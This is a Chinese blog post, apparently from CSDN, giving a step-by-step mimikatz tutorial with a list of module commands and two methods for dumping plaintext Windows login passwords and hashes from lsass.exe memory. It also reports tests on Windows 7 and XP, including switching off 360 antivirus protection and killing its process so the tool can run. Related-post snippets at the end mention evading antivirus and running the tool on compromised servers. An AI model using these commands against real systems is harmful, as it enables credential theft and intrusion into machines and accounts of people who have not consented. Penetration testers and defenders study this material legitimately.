轻量级调试器神器 - mimikatz (学习了,很强大的工具)

最新推荐文章于 2024-08-07 09:45:00 发布
最新推荐文章于 2024-08-07 09:45:00 发布
阅读量1.2w 收藏 11
点赞数
分类专栏: 密码破解 文章标签: mimikatz 调试 密码破解 windows

神器mimikatz使用详解

.mimikatz简介

 

mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。

 

mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器,其强大的功能还有待挖掘。

作者主页:http://blog.gentilkiwi.com/ 

 

 

.mimikatz基础命令

 

随便输入”xxx::”,会提示”modules:’xxx’ intr0uvable”,大概意思就是你输入的命令不存在,然后会列出所有可用的命令

 

所有的模块与命令,如下图(左边的是模块名称,右边的是描述):

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/FF9CB523E1C04F5B8E9082D5FBE0DC22

 

 

 

1.cls    清屏

 

2.exit    退出

 

3.version    查看mimikatz的版本

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B51AF11760DF432D9CF464BA28859E27

 

4.help    查看帮助信息(全是法文,只能找google了)

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/870E403DF0A549B2BAB204E2BBA56624

 

5.system::user    查看当前登录的系统用户

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/973C54032B0C4CFA84C6B9795EA7BB2D

 

6.system::computer    查看计算机名称

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/23ACB7735CA04103B6B5E077728B8F26

 

7.process::list    列出进程

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/CD80F2B5D1C74F78B451078CD378F9E5

 

8.process::suspend 进程名称    暂停进程

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/0EF31E121398421B8FC226A4973234D5

QQ进程还在,只是QQ无法使用了。

 

9.process::stop 进程名称    结束进程

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/E1BB784E1F5B4E5AA92A81B886B53CCD

 

10.process::modules    列出系统的核心模块及所在位置

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/56464C4268D5471DAAEE68B3D7729545

 

11.service::list    列出系统的服务

 

12.service::remove    移除系统的服务

 

13.service::start stop 服务名称    启动或停止服务

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/113DAAD3AB7B49DA8C0C46F183297137

 

14.privilege::list    列出权限列表

 

15.privilege::enable    激活一个或多个权限

 

16.privilege::debug    提升权限

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/5BB146E37EB244A9BF0D7F2DBDB70856

 

17.nogpo::cmd    打开系统的cmd.exe

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/A2617662170943E3862AB34E23E0FD28

 

18.nogpo::regedit    打开系统的注册表

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/5FB686563D9E4F8B99617FF34F0BC0FC

 

19.nogpo::taskmgr    打开任务管理器

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B78B325C96264C27B8C6C132AAAE67F6

 

20.ts::sessions    显示当前的会话

 

21.ts::processes    显示进程和对应的pid情况等

 

22.sekurlsa::wdigest    获取本地用户信息及密码

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B8E30254E6E94C8AB30FE2412BCEBB14

 

23.sekurlsa::wdigest    获取kerberos用户信息及密码

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/9742D21D9BEE49769BFFEA605004C8C1

 

24.sekurlsa::tspkg   获取tspkg用户信息及密码

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/1DB2CBAAFE85426182958542884200DF

 

25.sekurlsa::logonPasswords   获登陆用户信息及密码

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/126D9CA23586457AB0BD64CF9F613A2F

 

ps1.由于命令很多,就不一一列出了。

      2.kerberos是一种网络认证协议。至于tspkg好像是与远程连接时的网络身份认证有关的。

 

 

:mimikatz获取用户名及密码的方法

方法一

1. 运行主程序:mimikatz.exe

 

2. 输入:privilege::debug      提升权限

3. 输入:inject::process lsass.exe sekurlsa.dll    将sekurlsa.dll 注入到lsass.exe 中(运行到这一步会出现拒绝访问的提示)

4. 输入:@getLogonPasswords    即可获取hash和当前用户的明文密码!

 

原理就是登陆的时候输入的密码,经过 lsass.exe 里的wdigesttspkg两个模块调用后,它们对之进行加密处理,而没有进行擦除,

 

而且该加密通过特征可以定位,并且按照微软的算法可逆。 只要登陆过,就可以抓出来,它进行枚举的。


简单地说,在 Windows 中,当用户登录时,lsass.exe 使用一个可逆的算法,加密过的明文密码,并且把密文保存在内存中,没有清理,然后可以抓出来,还原。 

也就是说,开机以后,只要是登陆过的用户,在没重启前(因为重启内存就清零了,这里不包括使用其他方法清理内存),都可以抓出来,注销也是无用的,

 

因为内存中的密码并没有清除,所以还是可以抓出来的。  

方法二(直接调用sekurlsa模块):(经本人测试有效)

1. 运行主程序:mimikatz.exe
2. 输入:privilege::debug      提升权限

3.输入:sekurlsa::logonPasswords full

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/F1E50B4EB1634B53ACF14EC0AD39744B

 

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B07A73C5D1D9471CA6A82BB59E1CAE33

 

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/550E9155C00542B1926C3B7A24887D34

 

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/7CDB728FC1EB49F89AFAB22937B6E1A8

 

 

.实际测试

 

.测试系统:Windows 7旗舰版

测试情况如下图:

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/7DE2AC93E1364740B8DA7FB0B61B433E

 

 

在网上看到一些文章说,安装了360之类的杀毒软件后,神器就无法使用了,于是在本地测试了一下。

无论是启动着360,还是退出了360,都会出来下面的情况。

就是在输入inject::process lsass.exe sekurlsa.dll时提示:拒绝访问(如下图)

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/A2881306866F4377BD15380E5F7690EE

后来到进程里看了一下,原来360的主动防御进程还在,http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/9CA665500B804A8890FDCB69D91736A2

接着把360的实时防护全部关掉,再把那个进程结束掉就可以正常使用mimikatz了。

 

 

二.测试系统:Windows XP专业版sp3

测试情况如下图:

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/539DD6FC9E624E93B0B9FF95A398F707

 

 

.测试环境:远程连接一台虚拟机中的Windows 7旗舰版

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/4C6DF16996A84FA48CCF90B8D7ED8CC0

 

 

直接运行mimikatz提权时会提示错误,如下图:

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/9CEC0AFC1FCF4D4C9D7C94AEB9B262D9

大意是提示权限不足吧。

 

后来用以管理员身体运行就可以了

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/5B1448C7242949AA993C68A9A00863B8

 

 测试情况如下:http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/C6C2764D39CA442294E0EA487F0C2974

 

 总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~

爱码
关注
专栏目录
抓管理员密码神器--mimikatz
08-01
**mimikatz工具详解** mimikatz是一款由法国安全研究员Benjamin Delpy开发的强大工具,被誉为“抓管理员密码神器”。它主要用于提取操作系统中的敏感信息,包括但不限于明文密码、NTLM哈希、 Kerberos票证等。...
Mimikatz介绍
#7的博客
03-26 1842
本文主要介绍了mimikatz的定义、功能模块,并对常见的功能模块进行了详细的阐述。
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 1989
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...
萌新如何玩转mimikatz
最新发布
Python单行客的博客
08-07 1082
萌新如何玩转mimikatz
【后渗透】Mimikatz使用大全
hacker3062的博客
10-14 1904
Mimikatz 是一款功能强大轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码
域横向移动分析
qq_38675102的博客
12-31 905
windwos内网横移学习笔记
内网渗透神器Mimikatz)——使用教程
热门推荐
W小哥
04-16 7万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
cpp-mimikatz是作者学习C并进行Windows安全实验的工具
08-16
至于文件名"gentilkiwi-mimikatz-46bede3",这很可能是mimikatz项目的某个特定版本。"gentilkiwi"可能是作者或项目的别名,而"46bede3"可能是版本控制系统的提交ID,通常在Git等版本控制系统中使用,用于追踪代码的...
Invoke-Mimikatz.ps1
01-06
Invoke-Mimikatz.ps1
内网渗透专用-mimikatz
05-06
通过这些文件,用户不仅可以了解到mimikatz的基本使用,还可以深入学习如何通过mimicom模块进行通信,利用YARA规则来识别密码相关的行为,以及如何在不同的Windows平台上运行该工具。然而,值得注意的是,任何对...
S12-Mimikatz源码调试1
08-03
《S12-Mimikatz源码调试解析》 Mimikatz是一款著名的Windows...通过对Mimikatz的源码分析,我们可以学习到如何与Windows系统交互,调整权限,以及如何编写类似的工具,这对提升我们的系统安全理解和实践能力大有裨益。
mimikatz】获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 7213
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
mimikatz的使用
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-15 3万+
mimikatz的下载地址 , 提取码是 kcuh mimikatz是个好东西,它的功能很多,最重要的是能获取windows的账号及明文密码 使用方法: 1:远程连接使用 控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 这里抓到了administrator的账号,密码是null,说明没设密码 注意: 1、 文件夹里有两个版本,一个是对应32位系统的,一个是64位系
内网渗透神器Mimikatz)——使用教程,你会的还只有初级工程师的技术吗
2401_84446919的博客
04-18 1377
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等。从sam.hive和system.hive文件中获得NTLM Hash。sr98: 用于SR98设备和T5577目标的RF模块。rdm: RDM(830AL)器件的射频模块。rpc: mimikatz的RPC控制。导出lsass.exe进程中所有的票据。(在域控上执行)读取所有域用户的哈希。acr: ACR模块。开启Wdigest Auth。关闭Wdigest Auth。
mimikatz工具的介绍和基本使用
菜鸟-宇的个人博客
10-02 1480
该模块是用于提权的模块。mimikatz 很多模块需要高权限运行,因此执行高权限操作模块的时候需要先利用 privilege 模块进行提权。如下命令是用于提权的命令,只能用具有管理员权限的窗口执行该命令才能成功,普通用户权限执行该提权命令会失败。
九种方式运行Mimikatz
子曰小玖的博客
04-29 2361
前言 平时收集的一些姿势,用户绕过杀软执行mimikatz,这里以360为例进行bypass 测试。 下载最新版360: 未经处理的mimikatz直接就被杀了 下面开始进行绕过360抓密码 姿势一-powershell https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-...
探索Mimikatz:安全领域的瑞士军刀
gitblog_00040的博客
03-19 302
探索Mimikatz:安全领域的瑞士军刀 项目地址:https://gitcode.com/gentilkiwi/mimikatz Mimikatz是一个开源的安全工具,由法国的安全研究员Benjamin Delpy(网名GentilKiwi)创建。它的主要功能是用于提取Windows操作系统中的敏感信息,如明文密码、NTLM哈希和 Kerberos 凭证等。这使得它在网络安全测试、漏洞评估以及系...
mimikatz使用方法
课嗨教育的专栏
04-23 3814
0x00 简介 Mimikatz 是一款功能强大轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe进程中获取当前登录系统用户名的密码, lsass 是微软 Windows 系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass 内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对 lsass 逆算获取.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值